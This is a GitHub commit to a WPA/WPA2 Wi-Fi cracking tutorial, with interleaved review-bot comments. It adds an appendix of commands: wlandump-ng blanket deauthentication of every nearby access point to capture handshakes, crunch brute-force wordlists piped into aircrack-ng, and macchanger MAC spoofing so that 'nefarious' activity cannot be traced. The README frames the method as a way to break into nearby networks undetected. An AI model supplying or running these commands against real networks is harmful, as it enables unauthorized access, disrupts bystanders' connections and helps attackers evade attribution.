Add appendix.md and version bump to v1.1
brannondorsey committed Jul 30, 2017
1 parent 23e2688 commit e423fb2
Showing 3 changed files with 155 additions and 68 deletions.
12 changes: 12 additions & 0 deletions CHANGELOG.md
@@ -0,0 +1,12 @@
# Changelog

## 1.1

- Add [appendix](appendix.md)
- Handshake capture with `wlandump-ng`
- Programatic wordlist generation with `crunch`
- Macchanger info

## 1.0

- Original tutorial with rolling changes for small updates and typos, etc...
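Review bot: `Programatic` in the `crunch` bullet under 1.1 is misspelled and should read `Programmatic`, and the trailing `etc...` in the 1.0 entry would read cleaner as `etc.`. Since the three 1.1 bullets only restate appendix headings, consider linking each bullet to its section of `appendix.md` rather than only linking the appendix as a whole in the first bullet, so the changelog points readers directly at the new material.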
90 changes: 22 additions & 68 deletions README.md
@@ -4,7 +4,7 @@ Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and [Aircrack-ng](http://aircrack-

This is a brief walk-through tutorial that illustrates how to crack Wi-Fi networks that are secured using weak passwords. It is not exhaustive, but it should be enough information for you to test your own network's security or break into one nearby. The attack outlined below is entirely passive (listening only, nothing is broadcast from your computer) and it is impossible to detect provided that you don't actually use the password that you crack. An optional active deauthentication attack can be used to speed up the reconnaissance process and is described at the [end of this document](#deauth-attack).

If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at [the bottom](#list-of-commands).
If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at [the bottom](#list-of-commands). For a variety of suggestions and alternative methods, see the [appendix](appendix.md).

__DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use. Don't be a dick.__

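Review bot: the added sentence sends readers to the appendix for "alternative methods" without qualifying them, while the paragraph just above still states that the attack is "entirely passive" and "impossible to detect". The appendix's default `wlandump-ng` invocation transmits deauthentication and disassociation frames (its `-d` and `-D` options), which is neither passive nor undetectable, so either add a short caveat here, for example `(note that some of the methods in the appendix are active and detectable)`, or point readers at the appendix's passive-mode (`-p`) variant.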
@@ -162,86 +162,32 @@ If the password is cracked you will see a `KEY FOUND!` message in the terminal f
KEY FOUND! [ hacktheplanet ]
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
```

#### Cracking With Aircrack-ng combined with crunch

Crunch is a tool to generate combinations of given string or pattern.We can use crunch to generate password list to avoid use of wordlist. Time required depends on your system configurations.

Now, we need to install crunch
```bash
sudo apt-get install crunch
```

Now, use crunch with Aircrack-ng

```bash
# syntex 8 8 are min-length and max-length of password to generate
# 01234567890 is set of elements to construct password
# we can also use -t "@^%," to use pattern '@' - replaced with lowercase ',' - replaced with uppercase
# '%' - replaced with numbers and '^' - is replaced with special chars
# *************** don't forget '-' at the end
crunch 8 8 0123456789 | aircrack-ng -a2 'PATH-TO-CAP-FILE'.cap -b 58:98:35:CB:A2:77 -w -
```

An example to crack with 10 digit phone number using -t parameter
```bash
crunch 10 10 -t "%%%%%%%%%%" | aircrack-ng -a 2 XXXXXX.cap -b XX:XX:XX:XX:XX:XX -w -
Crunch will now generate the following amount of data: 110000000000 bytes
104904 MB
102 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 10000000000
Opening XXXXX.cap
Reading packets, please wait...

Aircrack-ng 1.2 rc4


[00:00:17] 16012 keys tested (1039.35 k/s)


Current passphrase: 0000015981


Master Key : B0 EA 2A 5B D3 81 A1 BE D0 7D E3 C3 92 03 55 51
C9 5A 68 5E 3C 1D 9F 64 B5 9D 3D FA 5E A9 48 DC

Transient Key : C0 30 AB 37 E6 CD BB 40 CE 34 56 F7 BD 13 71 3C
63 77 D8 71 21 2A 7F 6F 0A 89 CE AE 70 36 46 E8
C8 65 91 37 17 57 46 82 92 8B 8C 56 79 FC 0A 2A
18 A0 F6 B2 3B C7 9F 86 87 6D 4D D2 08 38 8F 71

EAPOL HMAC : AD 9B E6 04 BC 8B C5 0A 0F 72 68 CE D0 BD BC 5A
```

Everything else is same as above just dictionary file is replaced with generated passwords.

## Deauth Attack

A deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets include fake "sender" addresses that make them appear to the client as if they were sent from the access point themselves. Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake if you are listening with `airodump-ng`.
A deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets include fake "sender" addresses that make them appear to the client as if they were sent from the access point themselves. Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake if you are listening with `airodump-ng`.

Use `airodump-ng` to monitor a specific access point (using `-c channel --bssid MAC`) until you see a client (`STATION`) connected. A connected client look something like this, where is `64:BC:0C:48:97:F7` the client MAC.

```
CH 6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS
BSSID STATION PWR Rate Lost Frames Probe
9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS
```

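Review bot: the `airodump-ng` paragraph kept just below the rewritten deauth paragraph has a garbled sentence, `A connected client look something like this, where is `64:BC:0C:48:97:F7` the client MAC.`, which should read `A connected client looks something like this, where `64:BC:0C:48:97:F7` is the client MAC.`; and `sent from the access point themselves` in the paragraph this hunk touches should be `sent from the access point itself`. Removing the in-README `crunch` section is reasonable now that the appendix covers it, but the README's own command list (`#list-of-commands`, linked from the intro) should be checked so it no longer refers to the removed `crunch` pipeline.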
@@ -298,8 +244,16 @@ cap2hccapx.bin capture/-01.cap capture/-01.hccapx
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
```

## Appendix

The response to this tutorial was so great that I've added suggestions and additional material from community members as an appendix. Check it out to learn how to:

- Capture handshakes from every network around you with `wlandump-ng`
- Use `crunch` to generate 100+GB wordlists on-the-fly
- Spoof your MAC address with `macchanger`

## Attribution

Much of the information presented here was gleaned from [Lewis Encarnacion's awesome tutorial](https://lewiscomputerhowto.blogspot.com/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html). Thanks also to the awesome authors and maintainers who work on Aircrack-ng and Hashcat.

Shout out to [DrinkMoreCodeMore](https://www.reddit.com/user/DrinkMoreCodeMore), [hivie7510](https://www.reddit.com/user/hivie7510), [cprogrammer1994](https://github.com/cprogrammer1994), [0XE4](https://github.com/0XE4), [hartzell](https://github.com/hartzell), [zeeshanu](https://github.com/zeeshanu), [flennic](https://github.com/flennic), [bhusang](https://github.com/bhusang), [tversteeg](https://github.com/tversteeg), [gpetrousov](https://github.com/gpetrousov), [crowchirp](https://github.com/crowchirp) and [Shark0der](https://github.com/shark0der) who also provided suggestions and typo fixes on [Reddit](https://www.reddit.com/r/hacking/comments/6p50is/crack_wpawpa2_wifi_routers_with_aircrackng_and/) and GitHub. If you are interested in hearing some proposed alternatives to WPA2, check out some of the great discussion on [this](https://news.ycombinator.com/item?id=14840539) Hacker News post.
Shout out to [hiteshnayak305](https://github.com/hiteshnayak305), [enilfodne](https://github.com/enilfodne), [DrinkMoreCodeMore](https://www.reddit.com/user/DrinkMoreCodeMore), [hivie7510](https://www.reddit.com/user/hivie7510), [cprogrammer1994](https://github.com/cprogrammer1994), [0XE4](https://github.com/0XE4), [hartzell](https://github.com/hartzell), [zeeshanu](https://github.com/zeeshanu), [flennic](https://github.com/flennic), [bhusang](https://github.com/bhusang), [tversteeg](https://github.com/tversteeg), [gpetrousov](https://github.com/gpetrousov), [crowchirp](https://github.com/crowchirp) and [Shark0der](https://github.com/shark0der) who also provided suggestions and typo fixes on [Reddit](https://www.reddit.com/r/hacking/comments/6p50is/crack_wpawpa2_wifi_routers_with_aircrackng_and/) and GitHub. If you are interested in hearing some proposed alternatives to WPA2, check out some of the great discussion on [this](https://news.ycombinator.com/item?id=14840539) Hacker News post.
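Review bot: the new `## Appendix` section tells the reader to "Check it out" but never links to the file; make the first mention a link, e.g. `Check out the [appendix](appendix.md) to learn how to:`. The first bullet also deserves the caveat the appendix itself gives: capturing "from every network around you" with `wlandump-ng` means transmitting deauth frames in its default mode, and the appendix's own WARNING calls that likely illegal in most places, so a word such as "actively" in that bullet would keep this summary honest.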
121 changes: 121 additions & 0 deletions appendix.md
@@ -0,0 +1,121 @@
# Appendix

After the initial release of this tutorial, several people from various corners of the internet reached out with comments and suggestions. Two of the most interesting are alternative methods for capturing 4-way handshakes using `wlandump-ng` and programatically generating wordlists for Aircrack-ng using `crunch`. In an effort two keep the original tutorial short and sweet, I've included information about their wonderful suggestions here, and added a few of my own.

## Capturing handshakes with `wlandump-ng`

[@enilfodne](https://github.com/enilfodne) has [informed me](https://github.com/brannondorsey/wifi-cracking/issues/15) that the hashcat community has a prefered tool for capturing WPA 4-way handshakes, called `wlandump-ng`. This tool belongs to a suite of hashcat related utilities called [hcxtools](https://github.com/ZerBea/hcxtools) developed by [ZerBea](https://github.com/ZerBea), and has notable perks over `airdump-ng`. `wlandump-ng` allows you to blanket capture handshakes from every nearby network at once, hopping Wi-Fi channels in order to increase collection.


```bash
# clone hcxtools
git clone https://github.com/ZerBea/hcxtools
cd hcxtools

# build and install
# you will likely need to apt install the required dependencies:
# https://github.com/ZerBea/hcxtools#requirements
make
sudo make install

# blanket death connected clients from all nearby access points and listen for re-connections
# replace wlan0 with your wireless device name
wlandump-ng -i wlan0 -o capture.cap -c 1 -t 60 -d 100 -D 10 -m 512 -b -r -s 20

# once you've got a capture file, you can convert it to the hashcat capture format with
cap2hccapx.bin capture.cap capture.hccapx
```

`wlandump-ng` command-line args (use `-h` flag for full list):

- `-c 1`: start in the 2.4Ghz range from channel 1 (will go to 13)
- `-t 60`: stay on each channel for 60s (experiment with lower values, default is `5`)
- `-d 100`: send deauth every 100 beacon frames
- `-D 10`: send disassosciation packets every 10 beacons frames
- `-m 512`: internal ringbuffer size, use 512 for low resource machines
- `-b`: activate beaconing to last 10 probe requests
- `-r`: reset deauthentication/disassosciation counter if hop loop is on channel 1
- `-s 20`: display 20 status lines

**WARNING:** Using this is likely illegal in most places. See [here](https://github.com/ZerBea/hcxtools#warning) for more info.

`wlandump-ng` also offers the option to run in passive mode without transmitting any deauth/disassociation frames. This is recommended if you are are sensitive to disrupting the network activity of those around you (which you should be). The trade-off is that you will capture far fewer handshakes, but this method makes the capture undetectable.

```bash
# run with default settings in passive mode
wlandump-ng -i wlan0 -o capture.cap -p -s 20
```

## Generating wordlists with `crunch`

`crunch`is a tool to generate wordlists using combinations of a given string or pattern. We can use crunch to generate a password list on-the-fly and pipe it to `aircrack-ng` without having the wordlist saved to disk.

```bash
# install crunch
sudo apt-get install crunch
```

To get an idea of how crunch works, run it from the command-line (be ready to press `ctrl-c` once it starts spewing passwords):

```bash
# syntax 8 8 are min-length and max-length of password to generate
# 01234567890 is the set of characters to combine/permute to construct the passwords
crunch 8 8 0123456789
```

```
Crunch will now generate the following amount of data: 900000000 bytes
858 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 100000000
00000000
00000001
00000002
00000003
00000004
00000005
00000006
00000007
00000008
00000009
...
99999999
```

We can pipe the output of `crunch` as the input to `aircrack-ng`, using the passwords that it generates as our wordlist. Here we use the `crunch` special rule character `%` to denote a digit. This command attempts to crack WPA passwords that are 10-digit phone numbers (using 102GB of numbers generated by crunch on-the-fly):

```bash
# we can also use -t "@^%," to use pattern '@' - replaced with lowercase ',' - replaced with uppercase
# '%' - replaced with numbers and '^' - is replaced with special chars
# *************** don't forget '-' at the end
crunch 10 10 -t "%%%%%%%%%%" | aircrack-ng -a2 capture.cap -b 58:98:35:CB:A2:77 -w -
```

Thanks to [@hiteshnayak305](https://github.com/hiteshnayak305) for the introduction to `crunch` and including this update as a [PR](https://github.com/brannondorsey/wifi-cracking/pull/17).

## Macchanger

Whenever you are doing anything remotely nefarious with Wi-Fi, it is a good idea to spoof your the MAC address of your Wi-Fi device so that any network traffic that gets recorded can't be tied to serial assigned by your device manufacturer.

This is trivial with `macchanger`:

```bash
# download MAC changer
sudo apt-get install macchanger

# bring the device down
sudo ifconfig wlan0 down

# change the mac
# -A pics a random MAC w/ a valid vendor
# -r makes it truly random
# -p restores it to the original hardware MAC
sudo macchanger -A wlan0

# bring the device back up
sudo ifconfig wlan0 up
```

If you've got multiple cards, it might also be a good idea to do this to all of them. Or better yet, bring unused wireless interfaces down whenever you are attempting to capture handshakes, to leave as little trace as possible. Note that spoofing changes do not persist across reboots.

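Review bot: the passive `wlandump-ng -p` invocation is introduced only after the active default command, and the WARNING about legality comes after that command rather than before it; move the passive example and the warning ahead of the `-d`/`-D` invocation so a reader who copies only the first block gets the non-transmitting variant. The comment above `crunch 8 8 0123456789` says `01234567890` (eleven characters, with `0` twice) while the command uses `0123456789`; align the comment with the command. The `don't forget '-' at the end` comment in the `-t` block refers to the `-w -` on the `aircrack-ng` side of the pipe, which is worth saying explicitly since the comment sits above the `crunch` half. Spelling and grammar to fix in this file: `programatically` (programmatically), `two keep` (to keep), `prefered` (preferred), `airdump-ng` (airodump-ng), `disassosciation` twice (disassociation), `death connected clients` in the comment (deauth), `2.4Ghz` (2.4GHz), `spoof your the MAC address` (spoof the MAC address), `tied to serial` (tied to the serial), and `-A pics` (picks). Finally, `ifconfig` is deprecated on current Linux distributions; `sudo ip link set wlan0 down` / `up` is the equivalent and is worth listing alongside it.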